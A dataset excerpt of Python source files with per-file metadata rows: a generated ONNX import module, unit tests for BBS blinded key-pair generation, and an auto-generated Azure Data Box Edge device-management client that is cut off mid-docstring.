| 22.715686 | 36 | 0.624946 | 402 | 2,317 | 3.472637 | 0.109453 | 0.068768 | 0.045845 | 0.028653 | 0.946991 | 0.946991 | 0.946991 | 0.946991 | 0.946991 | 0.885387 | 0 | 0.052459 | 0.210186 | 2,317 | 101 | 37 | 22.940594 | 0.710383 | 0 | 0 | 0.938776 | 0 | 0 | 0.008632 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040816 | false | 0 | 0 | 0 | 0.061224 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8675323ea65ce6ab009c37363b630e3314e3018e | 258 | py | Python | pytorch/build.180/third_party/onnx/onnx/onnx_operators_pb.py | alchemy315/NoPFS | f3901e963e2301e8a6f1c7aac0511d0cf9a1889d | [
"BSD-3-Clause"
] | null | null | null | pytorch/build.180/third_party/onnx/onnx/onnx_operators_pb.py | alchemy315/NoPFS | f3901e963e2301e8a6f1c7aac0511d0cf9a1889d | [
"BSD-3-Clause"
] | null | null | null | pytorch/build.180/third_party/onnx/onnx/onnx_operators_pb.py | alchemy315/NoPFS | f3901e963e2301e8a6f1c7aac0511d0cf9a1889d | [
"BSD-3-Clause"
] | null | null | null | # This file is generated by setup.py. DO NOT EDIT!
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from .onnx_operators_onnx_torch_ml_pb2 import * # noqa
| 28.666667 | 55 | 0.837209 | 38 | 258 | 5.052632 | 0.657895 | 0.208333 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004484 | 0.135659 | 258 | 8 | 56 | 32.25 | 0.856502 | 0.205426 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.2 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8695f7fc5a5fea3c79a8bfa970ad8b5370928fd5 | 1,729 | py | Python | wrappers/python/ursa_bbs_signatures/models/keys/test/test_BlindedBlsKeyPair.py | trinsic-id/ffi-bbs-signatures | 25f9872b79d8b0343cb5ee8c1c152fa6804cc162 | [
"Apache-2.0"
] | 13 | 2020-09-02T02:54:17.000Z | 2022-03-30T14:55:08.000Z | wrappers/python/ursa_bbs_signatures/models/keys/test/test_BlindedBlsKeyPair.py | trinsic-id/ffi-bbs-signatures | 25f9872b79d8b0343cb5ee8c1c152fa6804cc162 | [
"Apache-2.0"
] | 15 | 2020-08-25T10:17:46.000Z | 2022-02-28T13:29:57.000Z | wrappers/python/ursa_bbs_signatures/models/keys/test/test_BlindedBlsKeyPair.py | trinsic-id/ffi-bbs-signatures | 25f9872b79d8b0343cb5ee8c1c152fa6804cc162 | [
"Apache-2.0"
] | 8 | 2021-01-31T12:51:29.000Z | 2022-03-30T14:55:10.000Z | import unittest
from ursa_bbs_signatures import BlindedBlsKeyPair
class TestBlindedBlsKeyPair(unittest.TestCase):
    """Unit tests for seeded BlindedBlsKeyPair generation in G1 and G2."""

    def _assert_valid_key_pair(self, key_pair, public_key_size, is_g1):
        """Shared assertions for a freshly generated blinded key pair.

        Factors out the block of checks that both tests duplicated.

        :param key_pair: pair returned by generate_g1 / generate_g2
        :param public_key_size: expected public key length
        :param is_g1: True when the pair is expected to be a G1 key
        """
        self.assertIsNotNone(key_pair, "Key pair should not be None")
        self.assertIsNotNone(key_pair.public_key, "Key pair should have public key")
        self.assertIsNotNone(key_pair.secret_key, "Key pair should have secret key")
        if is_g1:
            self.assertTrue(key_pair.is_g1, "Key should be G1 key")
            self.assertFalse(key_pair.is_g2, "Key should NOT be G2 key")
        else:
            self.assertTrue(key_pair.is_g2, "Key should be G2 key")
            self.assertFalse(key_pair.is_g1, "Key should NOT be G1 key")
        self.assertEqual(BlindedBlsKeyPair.secret_key_size(), len(key_pair.secret_key))
        self.assertEqual(public_key_size, len(key_pair.public_key))
        self.assertEqual(BlindedBlsKeyPair.blinding_factor_size(), len(key_pair.blinding_factor))

    def test_generate_g2_key_with_seed(self):
        """A seeded G2 blinded key pair has the expected component sizes."""
        key_pair = BlindedBlsKeyPair.generate_g2('just a seed')
        self._assert_valid_key_pair(
            key_pair, BlindedBlsKeyPair.public_g2_key_size(), is_g1=False)

    def test_generate_g1_key_with_seed(self):
        """A seeded G1 blinded key pair has the expected component sizes."""
        key_pair = BlindedBlsKeyPair.generate_g1('just a seed')
        self._assert_valid_key_pair(
            key_pair, BlindedBlsKeyPair.public_g1_key_size(), is_g1=True)
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| 48.027778 | 97 | 0.737999 | 235 | 1,729 | 5.140426 | 0.174468 | 0.139073 | 0.109272 | 0.129139 | 0.846026 | 0.846026 | 0.764901 | 0.764901 | 0.764901 | 0.764901 | 0 | 0.009749 | 0.169462 | 1,729 | 35 | 98 | 49.4 | 0.831476 | 0 | 0 | 0.444444 | 1 | 0 | 0.171197 | 0 | 0 | 0 | 0 | 0 | 0.592593 | 1 | 0.074074 | false | 0 | 0.074074 | 0 | 0.185185 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
86a970638203f62b1fd9fded741fe3459f24a9c9 | 52,738 | py | Python | sdk/edgegateway/azure-mgmt-edgegateway/azure/mgmt/edgegateway/operations/devices_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 2,728 | 2015-01-09T10:19:32.000Z | 2022-03-31T14:50:33.000Z | sdk/edgegateway/azure-mgmt-edgegateway/azure/mgmt/edgegateway/operations/devices_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 17,773 | 2015-01-05T15:57:17.000Z | 2022-03-31T23:50:25.000Z | sdk/edgegateway/azure-mgmt-edgegateway/azure/mgmt/edgegateway/operations/devices_operations.py | rsdoherty/azure-sdk-for-python | 6bba5326677468e6660845a703686327178bb7b1 | [
"MIT"
] | 1,916 | 2015-01-19T05:05:41.000Z | 2022-03-31T19:36:44.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class DevicesOperations(object):
"""DevicesOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: The API version. Constant value: "2019-03-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
    # Auto-generated client plumbing: keep the service client, the
    # configuration and the (de)serializers around for every operation
    # in this group.  api_version is pinned by the generator.
    self._client = client
    self._serialize = serializer
    self._deserialize = deserializer
    self.api_version = "2019-03-01"
    self.config = config
def list_by_subscription(
        self, expand=None, custom_headers=None, raw=False, **operation_config):
    """Gets all the data box edge/gateway devices in a subscription.

    :param expand: Specify $expand=details to populate additional fields
     related to the resource or Specify $skipToken=<token> to populate the
     next page in the list.
    :type expand: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: An iterator like instance of DataBoxEdgeDevice
    :rtype:
     ~azure.mgmt.edgegateway.models.DataBoxEdgeDevicePaged[~azure.mgmt.edgegateway.models.DataBoxEdgeDevice]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    def internal_paging(next_link=None, raw=False):
        # Fetches one page of results.  The first call builds the
        # collection URL; later calls follow the server-supplied
        # next_link verbatim (it already carries the query string).
        if not next_link:
            # Construct URL
            url = self.list_by_subscription.metadata['url']
            path_format_arguments = {
                'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
            }
            url = self._client.format_url(url, **path_format_arguments)

            # Construct parameters
            query_parameters = {}
            query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
            if expand is not None:
                query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')

        else:
            url = next_link
            query_parameters = {}

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            # Correlation id so the request can be traced service-side.
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            # Non-200 is surfaced as a CloudError carrying the service's
            # request id for support/diagnostics.
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        return response

    # Deserialize response: the paged iterator calls internal_paging
    # lazily as the caller advances through pages.
    deserialized = models.DataBoxEdgeDevicePaged(internal_paging, self._deserialize.dependencies)

    if raw:
        header_dict = {}
        client_raw_response = models.DataBoxEdgeDevicePaged(internal_paging, self._deserialize.dependencies, header_dict)
        return client_raw_response

    return deserialized
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices'}
def list_by_resource_group(
        self, resource_group_name, expand=None, custom_headers=None, raw=False, **operation_config):
    """Gets all the data box edge/gateway devices in a resource group.

    :param resource_group_name: The resource group name.
    :type resource_group_name: str
    :param expand: Specify $expand=details to populate additional fields
     related to the resource or Specify $skipToken=<token> to populate the
     next page in the list.
    :type expand: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: An iterator like instance of DataBoxEdgeDevice
    :rtype:
     ~azure.mgmt.edgegateway.models.DataBoxEdgeDevicePaged[~azure.mgmt.edgegateway.models.DataBoxEdgeDevice]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    def internal_paging(next_link=None, raw=False):
        # Fetches one page of results.  The first call builds the
        # collection URL; later calls follow the server-supplied
        # next_link verbatim (it already carries the query string).
        if not next_link:
            # Construct URL
            url = self.list_by_resource_group.metadata['url']
            path_format_arguments = {
                'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
                'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
            }
            url = self._client.format_url(url, **path_format_arguments)

            # Construct parameters
            query_parameters = {}
            query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
            if expand is not None:
                query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')

        else:
            url = next_link
            query_parameters = {}

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            # Correlation id so the request can be traced service-side.
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            # Non-200 is surfaced as a CloudError carrying the service's
            # request id for support/diagnostics.
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        return response

    # Deserialize response: the paged iterator calls internal_paging
    # lazily as the caller advances through pages.
    deserialized = models.DataBoxEdgeDevicePaged(internal_paging, self._deserialize.dependencies)

    if raw:
        header_dict = {}
        client_raw_response = models.DataBoxEdgeDevicePaged(internal_paging, self._deserialize.dependencies, header_dict)
        return client_raw_response

    return deserialized
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices'}
def get(
        self, device_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
    """Gets the properties of the data box edge/gateway device.

    :param device_name: The device name.
    :type device_name: str
    :param resource_group_name: The resource group name.
    :type resource_group_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: DataBoxEdgeDevice or ClientRawResponse if raw=true
    :rtype: ~azure.mgmt.edgegateway.models.DataBoxEdgeDevice or
     ~msrest.pipeline.ClientRawResponse
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Construct URL
    url = self.get.metadata['url']
    path_format_arguments = {
        'deviceName': self._serialize.url("device_name", device_name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Accept'] = 'application/json'
    if self.config.generate_client_request_id:
        # Correlation id so the request can be traced service-side.
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct and send request
    request = self._client.get(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200]:
        # Non-200 is surfaced as a CloudError carrying the service's
        # request id for support/diagnostics.
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None

    if response.status_code == 200:
        deserialized = self._deserialize('DataBoxEdgeDevice', response)

    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}'}
def _create_or_update_initial(
        self, device_name, data_box_edge_device, resource_group_name, custom_headers=None, raw=False, **operation_config):
    """Internal helper: sends the initial PUT for the create-or-update
    long-running operation and deserializes a completed (200) response.
    Polling for completion is handled by :meth:`create_or_update`."""
    # Construct URL
    url = self.create_or_update.metadata['url']
    path_format_arguments = {
        'deviceName': self._serialize.url("device_name", device_name, 'str'),
        'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str')
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}
    query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

    # Construct headers
    header_parameters = {}
    header_parameters['Accept'] = 'application/json'
    header_parameters['Content-Type'] = 'application/json; charset=utf-8'
    if self.config.generate_client_request_id:
        # Correlation id so the request can be traced service-side.
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    if custom_headers:
        header_parameters.update(custom_headers)
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

    # Construct body
    body_content = self._serialize.body(data_box_edge_device, 'DataBoxEdgeDevice')

    # Construct and send request
    request = self._client.put(url, query_parameters, header_parameters, body_content)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in [200]:
        exp = CloudError(response)
        exp.request_id = response.headers.get('x-ms-request-id')
        raise exp

    deserialized = None

    if response.status_code == 200:
        deserialized = self._deserialize('DataBoxEdgeDevice', response)

    if raw:
        client_raw_response = ClientRawResponse(deserialized, response)
        return client_raw_response

    return deserialized
def create_or_update(
        self, device_name, data_box_edge_device, resource_group_name, custom_headers=None, raw=False, polling=True, **operation_config):
    """Creates or updates a Data Box Edge/Gateway resource.

    :param device_name: The device name.
    :type device_name: str
    :param data_box_edge_device: The resource object.
    :type data_box_edge_device:
     ~azure.mgmt.edgegateway.models.DataBoxEdgeDevice
    :param resource_group_name: The resource group name.
    :type resource_group_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns DataBoxEdgeDevice or
     ClientRawResponse<DataBoxEdgeDevice> if raw==True
    :rtype:
     ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.edgegateway.models.DataBoxEdgeDevice]
     or
     ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.edgegateway.models.DataBoxEdgeDevice]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Kick off the LRO; always request the raw response so the poller can
    # inspect status codes and headers.
    raw_result = self._create_or_update_initial(
        device_name=device_name,
        data_box_edge_device=data_box_edge_device,
        resource_group_name=resource_group_name,
        custom_headers=custom_headers,
        raw=True,
        **operation_config)

    def get_long_running_output(response):
        # Deserialize the terminal response into the resource model.
        deserialized = self._deserialize('DataBoxEdgeDevice', response)
        return ClientRawResponse(deserialized, response) if raw else deserialized

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    if polling is True:
        polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}'}
def _delete_initial(
        self, device_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
    """Issue the initial DELETE request of the delete long-running operation.

    Raises CloudError unless the service answers 200/202/204; returns a
    ClientRawResponse when *raw* is True (no body is deserialized).
    """
    url = self._client.format_url(
        self.delete.metadata['url'],
        deviceName=self._serialize.url("device_name", device_name, 'str'),
        subscriptionId=self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'))

    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Caller headers may override the request id; accept-language wins last.
    header_parameters = {}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    header_parameters.update(custom_headers or {})
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header(
            "self.config.accept_language", self.config.accept_language, 'str')

    request = self._client.delete(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in (200, 202, 204):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    if raw:
        return ClientRawResponse(None, response)
def delete(
        self, device_name, resource_group_name, custom_headers=None, raw=False, polling=True, **operation_config):
    """Deletes the data box edge/gateway device.

    :param device_name: The device name.
    :type device_name: str
    :param resource_group_name: The resource group name.
    :type resource_group_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns None or
     ClientRawResponse<None> if raw==True
    :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
     ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    raw_result = self._delete_initial(
        device_name=device_name,
        resource_group_name=resource_group_name,
        custom_headers=custom_headers,
        raw=True,
        **operation_config)

    def get_long_running_output(response):
        # Delete produces no body; optionally surface the raw response.
        return ClientRawResponse(None, response) if raw else None

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    if polling is True:
        polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}'}
def update(
        self, device_name, resource_group_name, tags=None, custom_headers=None, raw=False, **operation_config):
    """Modifies a Data Box Edge/Gateway resource.

    :param device_name: The device name.
    :type device_name: str
    :param resource_group_name: The resource group name.
    :type resource_group_name: str
    :param tags: The tags attached to the Data Box Edge/Gateway resource.
    :type tags: dict[str, str]
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: DataBoxEdgeDevice or ClientRawResponse if raw=true
    :rtype: ~azure.mgmt.edgegateway.models.DataBoxEdgeDevice or
     ~msrest.pipeline.ClientRawResponse
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    # Only tags are patchable; wrap them in the PATCH model.
    parameters = models.DataBoxEdgeDevicePatch(tags=tags)

    url = self._client.format_url(
        self.update.metadata['url'],
        deviceName=self._serialize.url("device_name", device_name, 'str'),
        subscriptionId=self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'))

    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Caller headers may override the request id; accept-language wins last.
    header_parameters = {
        'Accept': 'application/json',
        'Content-Type': 'application/json; charset=utf-8',
    }
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    header_parameters.update(custom_headers or {})
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header(
            "self.config.accept_language", self.config.accept_language, 'str')

    body_content = self._serialize.body(parameters, 'DataBoxEdgeDevicePatch')

    request = self._client.patch(url, query_parameters, header_parameters, body_content)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in (200,):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    deserialized = (
        self._deserialize('DataBoxEdgeDevice', response)
        if response.status_code == 200 else None)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}'}
def _download_updates_initial(
        self, device_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
    """Issue the initial POST of the download-updates long-running operation.

    Raises CloudError unless the service answers 200/202; returns a
    ClientRawResponse when *raw* is True (no body is deserialized).
    """
    url = self._client.format_url(
        self.download_updates.metadata['url'],
        deviceName=self._serialize.url("device_name", device_name, 'str'),
        subscriptionId=self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'))

    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Caller headers may override the request id; accept-language wins last.
    header_parameters = {}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    header_parameters.update(custom_headers or {})
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header(
            "self.config.accept_language", self.config.accept_language, 'str')

    request = self._client.post(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in (200, 202):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    if raw:
        return ClientRawResponse(None, response)
def download_updates(
        self, device_name, resource_group_name, custom_headers=None, raw=False, polling=True, **operation_config):
    """Downloads the updates on a data box edge/gateway device.

    :param device_name: The device name.
    :type device_name: str
    :param resource_group_name: The resource group name.
    :type resource_group_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns None or
     ClientRawResponse<None> if raw==True
    :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
     ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    raw_result = self._download_updates_initial(
        device_name=device_name,
        resource_group_name=resource_group_name,
        custom_headers=custom_headers,
        raw=True,
        **operation_config)

    def get_long_running_output(response):
        # Operation returns no body; optionally surface the raw response.
        return ClientRawResponse(None, response) if raw else None

    lro_delay = operation_config.get(
        'long_running_operation_timeout',
        self.config.long_running_operation_timeout)
    if polling is True:
        polling_method = ARMPolling(lro_delay, **operation_config)
    elif polling is False:
        polling_method = NoPolling()
    else:
        polling_method = polling
    return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
download_updates.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/downloadUpdates'}
def get_extended_information(
        self, device_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
    """Gets additional information for the specified data box edge/gateway
    device.

    :param device_name: The device name.
    :type device_name: str
    :param resource_group_name: The resource group name.
    :type resource_group_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: DataBoxEdgeDeviceExtendedInfo or ClientRawResponse if
     raw=true
    :rtype: ~azure.mgmt.edgegateway.models.DataBoxEdgeDeviceExtendedInfo
     or ~msrest.pipeline.ClientRawResponse
    :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
    """
    url = self._client.format_url(
        self.get_extended_information.metadata['url'],
        deviceName=self._serialize.url("device_name", device_name, 'str'),
        subscriptionId=self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'))

    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Caller headers may override the request id; accept-language wins last.
    header_parameters = {'Accept': 'application/json'}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    header_parameters.update(custom_headers or {})
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header(
            "self.config.accept_language", self.config.accept_language, 'str')

    # This is a POST action endpoint even though it only reads data.
    request = self._client.post(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in (200,):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    deserialized = (
        self._deserialize('DataBoxEdgeDeviceExtendedInfo', response)
        if response.status_code == 200 else None)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
get_extended_information.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataBoxEdge/dataBoxEdgeDevices/{deviceName}/getExtendedInformation'}
def _install_updates_initial(
        self, device_name, resource_group_name, custom_headers=None, raw=False, **operation_config):
    """Issue the initial POST of the install-updates long-running operation.

    Raises CloudError unless the service answers 200/202; returns a
    ClientRawResponse when *raw* is True (no body is deserialized).
    """
    url = self._client.format_url(
        self.install_updates.metadata['url'],
        deviceName=self._serialize.url("device_name", device_name, 'str'),
        subscriptionId=self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
        resourceGroupName=self._serialize.url("resource_group_name", resource_group_name, 'str'))

    query_parameters = {
        'api-version': self._serialize.query("self.api_version", self.api_version, 'str'),
    }

    # Caller headers may override the request id; accept-language wins last.
    header_parameters = {}
    if self.config.generate_client_request_id:
        header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
    header_parameters.update(custom_headers or {})
    if self.config.accept_language is not None:
        header_parameters['accept-language'] = self._serialize.header(
            "self.config.accept_language", self.config.accept_language, 'str')

    request = self._client.post(url, query_parameters, header_parameters)
    response = self._client.send(request, stream=False, **operation_config)

    if response.status_code not in (200, 202):
        error = CloudError(response)
        error.request_id = response.headers.get('x-ms-request-id')
        raise error

    if raw:
        return ClientRawResponse(None, response)
def install_updates(
        self, device_name, resource_group_name, custom_headers=None, raw=False, polling=True, **operation_config):
    """Installs the updates on the data box edge/gateway device.

    :param device_name: The device name.
    :type device_name: str
    :param resource_group_name: The resource group name.
    :type resource_group_name: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: The poller return type is ClientRawResponse, the
     direct response alongside the deserialized response
    :param polling: True for ARMPolling, False for no polling, or a
     polling object for personal polling strategy
    :return: An instance of LROPoller that returns None or
     ClientRawResponse<None> if raw==True
